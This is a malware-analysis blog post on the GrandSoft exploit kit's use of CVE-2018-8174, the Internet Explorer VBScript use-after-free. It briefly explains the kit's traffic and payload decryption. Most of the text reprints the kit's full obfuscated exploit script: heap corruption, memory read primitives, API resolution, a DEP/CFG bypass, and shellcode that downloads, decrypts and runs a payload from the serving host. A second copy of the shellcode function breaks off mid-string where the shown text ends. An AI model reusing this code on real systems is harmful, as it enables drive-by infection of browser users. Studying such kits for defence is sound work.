Analyzing Shellcode of GrandSoft's CVE-2018-8174

First

CVE-2018-8174 exploit code published in 2018-05-21.
https://www.exploit-db.com/exploits/44741/

GrandSoft Exploit Kit used to be CVE-2016-0189 before. Now, it's using CVE-2018-8174. It's almost the same as PoC, except that some obfuscation has been added. However shellcode is unique. Previously VBScript (CVE-2016-0189) code generated cryptographic keys and decoded the payload. It was changed to doing in shellcode.

Previously flow is as follows:
    Random Number Generation -> Generate key Using Random Number -> 
    Add the key to the End of URL -> Download Encrypted Malware -> 
    Decode by the key

new flow is as follows:
    Random key Generation ->  Add the key to the End of URL -> 
    Download Encrypted Malware -> Decode by the key

      in shellcode

Traffic

First let's see the recent GrandSoft traffic. The link of saz file is introduced in Kafeine's blog.
https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html

Looking at this saz file, it looks like the following.


The flow of traffic is the same. It consists of Landing Page, Exploit and Malware. CVE-2018-8174 is used for exploit, which downloads and executes malware. Malware payload is encrypted. Therefore, the shellcode decrypts the malware using some numerical values of the URL.

CVE-2018-8174

For technical explanation of CVE-2018-8174 please refer to other articles.
https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/

Actually the code used in GrandSoft is like this.

Dim r4kWFTbo0
Dim OOOOO0O000
Dim u1QxQecTnfNH1
Dim OOOOO0O0000(40)
Dim o3qpIbXXvzd2
Dim OOOOO0O
Dim X6siIaXObDC3
Dim OOOOO0O0(6),OOOOO0O00(6)
S9nDOpLGtte = "End Function "
Dim b3XMsCkw5
Dim OOOOO0O00000,OOOOO0O000000
Dim T3QDCGhIo6
Dim OOOOO0O0000000
Dim l2dVvpwTgOZD7
Dim OOOOO0O00000000,OOOOO0O000000000
Dim V8LOuHnAcRF8
Dim OOOOO0O0000000000,OOOOO0O00000000000
L3GBDCQZNFT = "While Not x7fypqe.C1wRZrhz "
Dim O000O,O000OOO
Dim y8NSoVzQAaSr10
J5iGkJWBn = "For Each F4vTHd In l2IfOxf While Not B2DMl.d9HfMrAG For Each w1PXwuZ In y0RKKEQt "
OOOOO0O0000000=195940000 + 8557
Dim v9UpHkIm12
OOOOO0O00000=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
Dim X3OruFyGUBq13
OOOOO0O000000=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
Dim K4eTurgmPOJd14
OOOOO0O000=195800000 + 90093
Dim a9qWUTDvuTrS15
T5pctFCV = "Set m9IIiUhl = New V9NvMKu "
Dim U8VHUioXabcA17
Function lIIII(ByVal lIlIl)
Dim Z4ZrCVSsLU18
O000OOO0000=""
Dim T1UJcTQUz19
For index=0 To Len(lIlIl)-1
Dim T5CCqUuUd20
O000OOO0000=O000OOO0000 &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Dim B0QkRvxfTH21
Next
Dim i3zeBlfxLc22
O000OOO0000=O000OOO0000 &"00"
Dim b0JmqTWpuJ23
If Len(O000OOO0000)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
Dim X2BSPCpsWD24
O000OOO0000=O000OOO0000 &"00"
Dim z0uqreSro25
End If
Dim V2VQLeiRXc26
For IIIl=(&h1a1a+3208-&H26a2) To Len(O000OOO0000)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
e9sciEEDqf = "Set Q9hin = Nothing "
lIIIlI=Mid(O000OOO0000,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
Dim Q2uMseQQCM28
lIlIll=Mid(O000OOO0000,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
N7MmiIIpTx = "Set E7acoa = New G1OTQ Function K3sWQT(F9MeC, H5ATAPn Sub a9MTrCZO "
lIIII=lIIII &"%u" &lIlIll &lIIIlI
Dim o3DXOOLH30
Next
Dim F9QQltbQmsDW31
End Function
Dim R2wcSFhyfEEl32
Function lIlI(ByVal Number,ByVal Length)
s9HgDbuWD = "If Len(n2lab.z2INAL) > 0 Then For Each l9IlvTTU In N5QgByF "
IIII=Hex(Number)
e7WKICuQL = "If Len(Q7cENk.I8AIUv) > 0 Then Set d5zIGJLQ = Nothing "
If Len(IIII)<Length Then
O8IDAWqOeILF = "Sub L4tDKB While Not m9BkQT.L5axfDtw End Sub "
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Dim R2atgdRXVpO36
Else
h3mopXfkSm = "Function m4UHTkmT(G9WcQc, s3gdzzl If Len(G4TBLnwf.O3vEm) > 0 Then If Len(Z4PolZIw.I1QvcS) > 0 Then "
IIII=Right(IIII,Length)
m9NxsPWOv = "Set b7KvI = Nothing "
End If
Dim S2LvJrTaoUmM39
lIlI=IIII
O7VykVQFip = "Set k4spM = New H8hxq Private Sub Class c8zBRvSi Sub f2lSCL "
End Function
z2JdzgSLyrE = "If Len(a9lWy.o0Twn) > 0 Then f5oafA = L1EwTzlt & Trim(G6XbPbp.g4Xrh()) Set G0TTReMq = New Z7TCZ "
Function G0000(lIII)
Dim H5IOLSmP42
Dim value
Dim y2UOvplgAeex43
OOOOO0O00000000.mem(OOOOO0O0000000+8)=lIII+4
Dim T9JMeWFbX44
OOOOO0O00000000.mem(OOOOO0O0000000)=8 'type string
Dim t0SSLSxubCt45
value=OOOOO0O00000000.P0123456789
Dim C6LGgCXIr46
OOOOO0O00000000.mem(OOOOO0O0000000)=2
Dim J1qbCHws47
G0000=value
D6UWINuBhAH = "End Sub Private Sub Class y4xBnvP End Sub "
End Function
s1CIITiCbhc = "Function F6ywsTt(k6xBJ, p2RpOTQn End Function "
Function G00001(lIII)
c4dDUJlLLqC = "End Function "
G00001=G0000(lIII) And (131071-65536)
Dim k3rMFITCXPp51
End Function
Dim t1LcHCkwJx52
Function G000011(lIII)
o9dogsKrLHkC = "Set m3QkPShp = New P6OwpA "
G000011=G0000(lIII) And (&h17eb+1312-&H1c0c)
Z7FlbxSDcH = "Sub H3GWLP "
End Function
Dim t3mSOULv55
Sub llllll
Dim Z1SnlopJdSL56
End Sub
Dim p0IdWEPHXLJ57
Function vsscsc44444
Dim d9pwhdnlX58
OOOOO0O00000000.mem(OOOOO0O0000000)=(&h713+3616-&H1530)
L8zkLNTeLx = "Set t3aRG = Nothing "
vsscsc44444=OOOOO0O00000000.mem(OOOOO0O0000000+(&h169c+712-&H195c))
J1THdsnL = "Set G4albCG = New y9lgp End Sub "
End Function
Dim M8sgJJAfnQpH61
Sub ssdsssdsdsdsdsdsdsdsd(ByRef IlIIIl)
Dim A2ZMKsfZdd62
OOOOO0O00000000.mem(OOOOO0O0000000+(&h715+3507-&H14c0))=IlIIIl
b3oqMrfz = "For Each t7WrUTU In T8LHhr "
End Sub
Dim W3yMNdyVSv64
Function G0000115
r2XztgkSTEW = "Set u1bxACFy = New v3tEWu End Function "
On Error Resume Next
Dim S4XqwpilAH66
Dim lllll
Dim f8sDqsTSQL67
lllll=llllll
Dim E2BqeWcnuc68
lllll=null
Dim W7qNHJzrG69
ssdsssdsdsdsdsdsdsdsd lllll
Dim d2TIAZnDo70
G0000115=vsscsc44444()
Dim n5KUcEFGiSi71
End Function
Dim O0IKHtbN72
Function G00001152(IllIll)
z7hhKJLp = "Set x3uhBrS = New l5QDsHqU Function T5HFVdI(I6UbI, E5PFBJ "
Dim llIl
Dim E4gIVxRTp74
llIl=IllIll And &hffff0000
Dim T4qMdKxD75
Do While G0000(llIl+(&h748+4239-&H176f))<>544106784 Or G0000(llIl+(&ha2a+7373-&H268b))<>542330692
J9RgfDLVOV = "Private Sub Class F7QIiOmm While Not P3BKMAzx.n6DEN Private Sub Class U6tvbfTa "
llIl=llIl-65536
Dim G9JdsIMouI77
Loop
Dim V8uiilDP78
G00001152=llIl
L1oxiVHwW = "End Sub "
End Function
B7stXivWEk = "For Each f8ySXo In v5wKkM If Len(D8qFKpi.y6BTRoQb) > 0 Then Set S1uEaaR = Nothing "
Function StrCompWrapper(lIII,llIlIl)
Dim P1FgqQgqC81
Dim lIIlI,IIIl
Dim s9MEXOQP82
lIIlI=""
Dim w9GofFRihKNW83
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
Dim Q5hbvtsT84
lIIlI=lIIlI &Chr(G000011(lIII+IIIl))
Dim l8BfqpCByv85
Next
Dim I9CtgtQThN86
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
z6XPmMwOfI = "Set g2efvH = Nothing Private Sub Class J4qpf While Not w0pRBFsO.n5BKft "
End Function
Dim g5yPikcqhF88
Function GetBaseFromImport(base_address,name_input)
Dim z4ztTTFnLt89
Dim import_rva,nt_header,descriptor,import_dir
Dim e8uAELMXgrIg90
Dim IIIIII
I0GNqfUHq = "End Sub While Not r9TTQ.R6KPot u4Vvqd = t9TSNfB & Trim(H2iGBiK.v1Lzp()) "
nt_header=G0000(base_address+(&h3c))
Dim d3XiqbLtuk92
import_rva=G0000(base_address+nt_header+&h80)
d5UfvJZTvkDA = "Set U8LIr = New l6VRpf For Each c1hIW In G6yuVb "
import_dir=base_address+import_rva
Dim w9NPmTRb94
descriptor=0
x8wgQaGh = "For Each T8IgL In n1fBIH "
Do While True
Dim W6WBdUzDbvwE96
Dim Name
Dim x0uyChlT97
Name=G0000(import_dir+descriptor*(&h14)+&hc)
Dim Z6XsdyIhla98
If Name=0 Then
X7XUaLvr = "Private Sub Class N9kQCuO While Not K3KHCgNF.k6HucRFr Sub S8Xfxd "
GetBaseFromImport=&hBAAD0000
Dim N5AiIGoghWf100
Exit Function
Dim O2rPRNMVmG101
Else
Dim B8cTChhq102
If StrCompWrapper(base_address+Name,name_input)=0 Then
Dim J0ogIoHT103
Exit Do
Dim D2Abemgyux104
End If
Dim E2fSTQld105
End If
Dim S7SiTdunRdMM106
descriptor=descriptor+1
Dim O4PSMlcs107
Loop
F3mtkFNE = "End Function Set d8WqBE = New i6RFgKc Function m5ZmoTEf(I4LuxIdK, h9Edgqv "
IIIIII=G0000(import_dir+descriptor*(&h14)+&h10)
J8OHAemJhKA = "Set h3NHcAT = New U5kGz o5ESlP = n6ZoHw & Trim(I9VEFef.R9dOAbg()) "
GetBaseFromImport=G00001152(G0000(base_address+IIIIII))
Dim L1XvWADVVMB110
End Function
Dim y3zlrXnJS111
Dim E6NVTggrAK112
Function gddgddddddddd(G0000115222,name)
Dim w1vWZCiDEM113
Dim p,G00001152223,index
Dim A1RaffVHAFV114
Dim G000011522,function_names,function_ordin
Dim Q4MvmDCrqg115
Dim Illlll
Dim D9PygrcSmhHo116
p=G0000(G0000115222+&h3c)
n9Liwczo = "Sub J0QRG If Len(A7VzCkM.V6WsyFTt) > 0 Then "
p=G0000(G0000115222+p+&h78)
Dim Z7sryoHBsJ118
G00001152223=G0000115222+p
E1rrArlu = "Set T2IkGsT = New G2hIVZ u6kVMog = t2KlTP & Trim(L9neteV.y5MGkJ()) "
Dim H7TRQNkIun120
G000011522=G0000115222+G0000(G00001152223+&h1c)
Dim I6eExGoU121
function_names=G0000115222+G0000(G00001152223+&h20)
Dim L6kLMxwC122
function_ordin=G0000115222+G0000(G00001152223+&h24)
Dim Z2TaZfXCpJx123
index=0
Dim Q1vbnCTrD124
Do While True
o4yryAoATUBs = "Set d3kHEdt = New s7EUrHp "
Dim lllI
Dim q8qsfopzJdk126
lllI=G0000(function_names+index*4)
Dim Z0gPhSglVVKw127
If StrCompWrapper(G0000115222+lllI,name)=0 Then
Dim A0XQZwzJTXl128
Exit Do
Dim U2ZtOITTXH129
End If
Dim Z2iuSSLwLN130
index=index+1
Dim R9ipqBakoCCT131
Loop
u6fPloJJL = "Set O5vMVf = Nothing Set o6wTWUTq = New f1JsV l6aBcl = B8KItmy & Trim(Z2stAkdE.K5EiUeFZ()) "
Illlll=G00001(function_ordin+index*2)
t4JOAPxWao = "Private Sub Class g4FdoGo "
p=G0000(G000011522+Illlll*4)
R8LXAlutqC = " L4CCBJN = z8yaTQ & Trim(k5OsgDXz.w8buNcnK()) Sub X3UcNLRp End Sub "
gddgddddddddd=G0000115222+p
Dim f5wuapzZB135
End Function
Dim P5OMufJnkb136
Dim g9xsrGBR0
Dim L5VvPmXuCHo1
Function aaaAA33444333555(ByVal value)
Dim H9hmIkcDI2
Dim High,Low
Dim o3GrVTUD3
High=lIlI((value And &hffff0000)/&h10000,4)
Dim z2VyTmBR4
Low=lIlI(value And &hffff,4)
Dim P9XStNoPA5
aaaAA33444333555=Unescape("%u" &Low &"%u" &High)
Dim B1aZedSCP6
End Function
Dim d2fnrwOlIol7
Function lIllIl
Dim K6gXLTdiXw8
Dim IIIl,G000011522232,G00001152223246,G0000115222324,aaaAA33444333,aaaAA33,aaaAA33444
Dim p6QoNVGTH9
G000011522232=lIlI(O000O,8)
W8xGiLZQgm = "While Not u1OONAE.I3bqF For Each H3vAFqxz In Q9wNFPGL For Each T4gktCu In H4qeP "
G0000115222324=Mid(G000011522232,1,2)
Dim M0SXXrUzUJcr11
aaaAA33444333=Mid(G000011522232,3,2)
Dim g7ZssRnIIR12
aaaAA33=Mid(G000011522232,5,2)
Dim Z1pDPKoE13
aaaAA33444=Mid(G000011522232,7,2)
Dim B4Clfwhmppb14
G00001152223246=""
F9MDopUDeLh = "For Each v9kLVdPp In E8Bscw Private Sub Class W7HqB Set x4lZenvX = Nothing "
G00001152223246=G00001152223246 &"%u0000%u" &aaaAA33444 &"00"
Dim h3NmfOTlHkqC16
For IIIl=1 To 3
Dim Q0dNAFMpBX17
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33
L6QTQhTyZrQc = "Sub W6zytNI End Sub While Not z2yzkCNL.S4Mkb "
G00001152223246=G00001152223246 &"%u" &aaaAA33444 &G0000115222324
Dim x6eucfEfWQU19
Next
Dim h6RNTOURIQX20
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33
Dim R4cryWNyx21
G00001152223246=G00001152223246 &"%u00" &G0000115222324
M0KNhJRT = "End Sub "
lIllIl=Unescape(G00001152223246)
Dim X8zgTTLkMd23
End Function
Dim G3fTNmSMKU24
Function jjjjj333333(ShellcodeAddrParam) 'bypass cfg
Dim c7KtVzyvFcT25
Dim G00001152223246
Dim p8xDxemX26
G00001152223246=String((100334-65536),Unescape("%u4141"))
Dim x3sMCAqdr27
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam)
Dim c4RLWlbqTRqe28
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam)
Dim P4ZPKcRItFXG29
G00001152223246=G00001152223246 &aaaAA33444333555(&h3000)
Dim b9RppUdna30
G00001152223246=G00001152223246 &aaaAA33444333555(&h40)
Dim y7NHmxEO31
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam-8)
Dim p1rPTbQAzzNu32
G00001152223246=G00001152223246 &String(6,Unescape("%u4242"))
q5mhWpHSO = "Function f5WdLxFT(W1IzXrlr, h4DwhVc Private Sub Class d9qfwI Set R6OMgp = New z2HbLTe "
G00001152223246=G00001152223246 &lIllIl()
Dim o7nipSBlTptJ34
G00001152223246=G00001152223246 &String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141"))
R7HslHPu = "Sub h2fHJ "
jjjjj333333=G00001152223246
Dim T1rCzxbaBmS36
End Function
Dim X7PXMUADl37
Function eeee6666(mmm22222)
Dim d1tFcNgPT38
Dim G00001152223246
Dim T1nliuABi39
Dim lllllI
Dim C8GxXneW40
lllllI=mmm22222+&h23
T9NEwrqhcN = "End Function "
G00001152223246=""
Dim D6DVtLOSbWeA42
G00001152223246=G00001152223246 &aaaAA33444333555(lllllI)
Dim F7DDoWkmetNA43
G00001152223246=G00001152223246 &String((&hb8-LenB(G00001152223246))/2,Unescape("%4141"))
Dim O1TvStXN44
G00001152223246=G00001152223246 &aaaAA33444333555(O000OOO)
Dim x2QKxZPgWSrm45
G00001152223246=G00001152223246 &aaaAA33444333555(&h1b)
Dim g3TSGwNNTvl46
G00001152223246=G00001152223246 &aaaAA33444333555(0)
I5cwEhOROJZp = "End Sub "
G00001152223246=G00001152223246 &aaaAA33444333555(mmm22222)
Dim G8gTBuqohTA48
G00001152223246=G00001152223246 &aaaAA33444333555(&h23)
Dim I2TEHrVNkSn49
G00001152223246=G00001152223246 &String((&400-LenB(G00001152223246))/2,Unescape("%u4343"))
Dim C5LKfeoz50
eeee6666=G00001152223246
Dim Q1kBLgWai51
End Function
Dim w9hKsTiITQT52
Sub ExecuteShellcode
Dim a5vsITVrr53
OOOOO0O00000000.mem(OOOOO0O0000000)=&h4d 'DEP bypass
W9yiSsZEFH = "End Sub End Sub End Sub "
OOOOO0O00000000.mem(OOOOO0O0000000+8)=0
V3hTApwpF = "Set G9fhXW = New A4rXxqo Set u8rTTyc = New o4VFg Private Sub Class e9TXunV "
msgbox(OOOOO0O0000000) 'VT replaced
e9vSIHqy = "For Each w2dcN In m3UmafoO Function E1guW(s8Tdm, Q5ygfTXZ Function D7bxCbg(L2AXuRG, i0ZfGm "
End Sub
Dim K3dzbfOBuzgb57
Dim q9hgUHqmUShe58
Class cla1
Private Sub Class_Terminate()
Set OOOOO0O0(OOOOO0O000)=OOOOO0O((&h1078+5473-&H25d8))
OOOOO0O000=OOOOO0O000+(&h14b5+2725-&H1f59)
OOOOO0O((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set OOOOO0O00(OOOOO0O000)=OOOOO0O((&h15b+3616-&Hf7a))
OOOOO0O000=OOOOO0O000+(&h880+542-&Ha9d)
OOOOO0O((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(OOOOO0O0000000+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
OOOOO0O0(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=OOOOO0O00000
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set OOOOO0O0(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
OOOOO0O00(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=OOOOO0O000000
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set OOOOO0O00(IIIl)=llII
Next
End Property
End Class
Set OOOOO0O0000000000=New lllIIl
Set OOOOO0O00000000000=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set OOOOO0O0000(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set OOOOO0O0000(IIIl)=New llIIl
Next
OOOOO0O000=0
For IIIl=0 To 6
ReDim OOOOO0O(1)
Set OOOOO0O(1)=New cla1
Erase OOOOO0O
Next
Set OOOOO0O00000000=New llIIl
OOOOO0O000=0
For IIIl=0 To 6
ReDim OOOOO0O(1)
Set OOOOO0O(1)=New cla2
Erase OOOOO0O
Next
Set OOOOO0O000000000=New llIIl
End Sub
Sub InitObjects
OOOOO0O00000000.SetProp(OOOOO0O0000000000)
OOOOO0O000000000.SetProp(OOOOO0O00000000000)
OOOOO0O0000000=OOOOO0O000000000.mem
End Sub
Sub sssfsfsfsfsfs222
UAF
InitObjects
vb_adrr=G0000115()
vbvvvvvvvv=G00001152(G0000(vb_adrr))
mbmmmmmmm=GetBaseFromImport(vbvvvvvvvv,"msvcrt.dll")
mbmbmdddcdd=GetBaseFromImport(mbmmmmmmm,"kernelbase.dll")
ntffdddddfss=GetBaseFromImport(mbmmmmmmm,"ntdll.dll")
O000OOO=gddgddddddddd(mbmbmdddcdd,"VirtualProtect")
O000O=gddgddddddddd(ntffdddddfss,"NtContinue")
ssdsssdsdsdsdsdsdsdsd c111111()
c2222222=vsscsc44444()+8
ssdsssdsdsdsdsdsdsdsd jjjjj333333(c2222222)
mmm22222=vsscsc44444()+69596
ssdsssdsdsdsdsdsdsdsd eeee6666(mmm22222)
mnmm4333333=vsscsc44444()
ExecuteShellcode
End Sub
Function c111111()
locationUrl = "http://" & window.location.hostname & "/7"
strString = locationUrl
linkHex =""
For i=1 To Len(strString)
linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))
Next
stringSC = ""
stringSC = linkHex + ""
g = Round(Len(stringSC)/4)
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00"
outStr = ""
For i = 1 to Len(stringSC) Step 4
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2)
Next
U109 = "%u"
U88 = "%uE8"
UF1 = "%uF"
outStr = outStr + "%u0000"
G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 &"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 &"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr )
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141"))
c111111=G00001152223246
End Function
sssfsfsfsfsfs222
Dead code is included, but it is basically the same as PoC. What is different is PoC with GetShellcode part. GrandSoft's GetShellcode function has been renamed to the c111111 function, and it is such a function.

Function c111111()
locationUrl = "http://" & window.location.hostname & "/7"
strString = locationUrl
linkHex =""
For i=1 To Len(strString)
linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))
Next
stringSC = ""
stringSC = linkHex + ""
g = Round(Len(stringSC)/4)
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00"
outStr = ""
For i = 1 to Len(stringSC) Step 4
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2)
Next
U109 = "%u"
U88 = "%uE8"
UF1 = "%uF"
outStr = outStr + "%u0000"
G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 &"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 